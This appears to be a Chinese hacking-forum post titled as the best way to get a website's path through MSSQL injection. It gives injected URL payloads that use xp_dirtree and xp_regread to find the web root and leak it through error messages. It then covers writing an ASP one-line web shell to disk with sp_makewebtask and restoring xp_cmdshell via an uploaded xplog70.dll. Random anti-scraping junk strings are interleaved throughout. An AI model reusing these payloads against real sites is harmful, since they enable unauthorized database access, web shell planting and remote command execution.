中国网络渗透测试联盟
标题:
MSsqlL注入取得网站路径最好的方法
[打印本页]
作者:
admin
时间:
2012-9-13 17:20
标题:
MSsqlL注入取得网站路径最好的方法
好,我们exec master..xp_dirtree'd:/test'
) Q; G0 p" _6 {" d S2 U7 m
假设我们在test里有两个文件夹test1和test2在test1里又有test3
+ K5 y( m; z! B
结果显示
3 B! _& i$ [2 c* F) O( b" @
8 g3 [8 b6 h2 E, ~% c( u
subdirectory depth
4 Q& l( m) T" j% i7 I' e- F
test1 1
4 _" a3 I" ?! ~3 Q3 U, N5 B1 h; j( C) v
test3 2
" L, ?/ j2 I% N# g0 v
test2 1
/ n4 b' `( I' I% g1 p3 K0 f A
( a/ e: b2 _/ V B0 U# \
哈哈发现没有那个depth就是目录的级数
5 X0 p& C7 t3 ~# a7 `" v
ok了,知道怎么办了吧
2 J0 ]4 d' ~+ T) f; X6 E
; R$ z5 C% y }: H! `
http://www.xxxxx.com/down/list.asp?id=1;create
table dirs(paths varchar(1000),id int)--
5 ^" J l- K% o% v% n1 h( ^1 _8 M. T5 p
http://www.xxxxx.com/down/list.asp?id=1;insert
dirs exec master.dbo.xp_dirtree 'd:\' --
6 ^$ F4 G" ?: m( D& L9 f- G, _
http://www.xxxxx.com/down/list.asp?id=1
and 0<>(select top 1 paths from dirs where id=1)-
0 C5 `+ X) @1 ~5 _ L( U
5 h( T. |2 C( @) P& y" N
只要加上id=1,就是第一级目录 。
1 }( u0 Z$ r6 u {' T) l& I
" C- h) z' a7 Y' |
/ r, E2 j8 Q( |% R& Z% D
通过注册表读网站路径:
5 v$ q( ]* {0 X
+ i( L+ u! S2 t8 G& I8 g
1.;create table [dbo].[cyfd] ([gyfd][char](255));
9 I7 p. d# K; F! j0 ~2 g
! X4 g E. T2 `: J7 i' n, ?- A
2.DECLARE @result varchar(255) EXEC master.dbo.xp_regread 'HKEY_LOCAL_MACHINE', 'SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots', '/', @result output insert into 临时表 (临时字段名) values(@result);--
; ]: \" E' R4 Q4 |/ p+ y
id=2;DECLARE @result varchar(255) EXEC master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots', '/', @result output insert into cyfd (gyfd) values(@result);--
; r7 J) X+ }: ~5 _
2 i$ L* d: `; ?, M
3.and 1=(select count(*) from 临时表 where 临时字段名>1)
$ h. l+ n4 x* Y- g5 D
and 1=(select count(*) from cyfd where gyfd > 1)
' G+ T& b ?" O% V N. F7 X `
这样IE报错,就把刚才插进去的Web路径的值报出来了
& v$ F! y3 V2 t0 g+ q
$ g/ W- G" T6 c$ h5 y! |
4.drop table cyfd;-- 删除临时表
) N& M- Y- A* U6 b( |
& y$ I+ F0 U3 P% U9 ]& ?5 P8 j
获得webshell方法:
; B, X ?& C* J3 L) C& b& ~
1.create table cmd (a image)-- \**cmd是创建的临时表
2 }7 \2 C! ]6 q3 s7 G/ U4 P
9 J% ~7 e% Z$ r2 z
2.insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)-- 往cmd表里插入一句话
# B3 v* ] K* D: N1 O. R3 j! |
: ^4 P- r' X) L. k4 n
9 k& @' K" x& b2 Z' E& M N) D# ~ J+ M. L
3.EXECUTE sp_makewebtask @outputfile = 'WEB绝对路径\导出的文件名.asp',@query = 'SELECT image FROM cmd'
, o% N( m* E0 Z8 V; L5 ?
EXECUTE sp_makewebtask @outputfile = 'WEB绝对路径\导出的文件名.asp',@query = 'SELECT 你的字段 FROM 你建的临时表'
* W6 O0 A2 i* y1 M3 r0 t' O( z
( p9 }" H! j% p5 f* T* Z
4.drop table cmd;-- 删除cmd临时表
: g' I4 _/ \2 E" C3 D5 i
, b+ \: V/ I& o8 l4 n$ f
恢复xp_cmdshell方法之一:
/ Q2 `: b- G% W6 }
我很快就把xplog70.dll文件给他上传到e:\inetpub\wwwroot目录下了,来吧,我们来给他恢复,提交:
" g+ I' D, H" G" q1 Z% O
http://www.something.com/script.asp?id=2;EXEC
master.dbo.sp_addextendedproc 'xp_cmdshell','e:\inetpub\wwwroot\xplog70.dll'
3 f6 H! i1 ?* H
恢复,支持绝对路径的恢复哦。:)
j0 J6 H" E- N( h$ h
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2